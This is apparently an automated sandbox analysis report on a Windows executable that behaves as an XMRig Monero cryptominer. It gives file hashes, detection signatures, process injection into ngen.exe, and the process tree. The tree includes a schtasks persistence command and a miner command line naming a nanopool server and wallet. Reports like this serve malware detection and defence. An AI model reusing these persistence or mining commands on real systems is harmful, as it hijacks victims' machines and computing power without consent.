Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19/07/2023, 22:03
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230712-en
General
-
Target
file.exe
-
Size
3.2MB
-
MD5
3a20a6145a7a57af149bfd110fdd6300
-
SHA1
7626cf05a564a565d17cb85aaf6b93c871c3de91
-
SHA256
8e9e34d70a388ee2721911e266e68ebfcdaf460803fa1baf66f9b6cbf560b2a9
-
SHA512
182bf26f7d072d56a0435c4a088baa2d5d1d58c8c048c7f517a91177ee6cec52f3e83e2bfbaf5f046265117281daf059d6bca39cecd5fa279ff081f7fff9319d
-
SSDEEP
49152:2PtyRSv3AJhGiPWGhUyJ4STSVP1JXrb2XpZofxX3ePG0cid7X9MJM5r:EcRe388iPWGmyJ5GV7n2XjOXeGxihrr
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/4940-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-161-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-164-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-166-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-167-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-168-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-169-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-171-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4940-172-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/2720-133-0x00000000009B0000-0x0000000000CF2000-memory.dmp net_reactor behavioral2/files/0x000a000000023269-148.dat net_reactor behavioral2/files/0x000a000000023269-149.dat net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation PCELK.exe -
Executes dropped EXE 1 IoCs
pid Process 440 PCELK.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 440 set thread context of 4940 440 PCELK.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3016 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2548 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 440 PCELK.exe 440 PCELK.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2720 file.exe Token: SeDebugPrivilege 440 PCELK.exe Token: SeLockMemoryPrivilege 4940 ngen.exe Token: SeLockMemoryPrivilege 4940 ngen.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4940 ngen.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2720 wrote to memory of 3732 2720 file.exe 93 PID 2720 wrote to memory of 3732 2720 file.exe 93 PID 3732 wrote to memory of 2548 3732 cmd.exe 95 PID 3732 wrote to memory of 2548 3732 cmd.exe 95 PID 3732 wrote to memory of 440 3732 cmd.exe 97 PID 3732 wrote to memory of 440 3732 cmd.exe 97 PID 440 wrote to memory of 4384 440 PCELK.exe 100 PID 440 wrote to memory of 4384 440 PCELK.exe 100 PID 4384 wrote to memory of 3016 4384 cmd.exe 103 PID 4384 wrote to memory of 3016 4384 cmd.exe 103 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 PID 440 wrote to memory of 4940 440 PCELK.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEB1B.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2548
-
-
C:\ProgramData\BinEngFrame\PCELK.exe"C:\ProgramData\BinEngFrame\PCELK.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PCELK" /tr "C:\ProgramData\BinEngFrame\PCELK.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PCELK" /tr "C:\ProgramData\BinEngFrame\PCELK.exe"5⤵
- Creates scheduled task(s)
PID:3016
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4940
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
722.0MB
MD53271628956fd21cd715d41bedfd91216
SHA14313f30f7bfdcc3dd4a787cb69d85d92965784d3
SHA256169291fe508a802bcbf5efad4a9de787c420ba29e26aebb7b8d46280ead573f4
SHA51272ea68f49b0ca8c5cd7b63846979e4f9bdf80fab3ce6a2c92ee3fc329aa23106c65f84d3499e7f40e52a67b9f0b072a33d8ddef793822df7758b47b43b3d284f
-
Filesize
722.0MB
MD53271628956fd21cd715d41bedfd91216
SHA14313f30f7bfdcc3dd4a787cb69d85d92965784d3
SHA256169291fe508a802bcbf5efad4a9de787c420ba29e26aebb7b8d46280ead573f4
SHA51272ea68f49b0ca8c5cd7b63846979e4f9bdf80fab3ce6a2c92ee3fc329aa23106c65f84d3499e7f40e52a67b9f0b072a33d8ddef793822df7758b47b43b3d284f
-
Filesize
145B
MD5cb982cd8c77c6f19e6b0ae7347e77ebe
SHA16a81aed2cca668af07db628d7cb5cedc1c94cb08
SHA256b531dbcd9d404faee426733e8ff37b3d8f2cd82f3aeab7901512011812fd8ea9
SHA512ed876060391d2cc84d8ebf4d07ef2b670f7758f82a2d075307794a28f1daa8f4810b01c763537620bfb5829deefb5f8b5f3a99bd4dae9fd95fbf7b710c24e7fe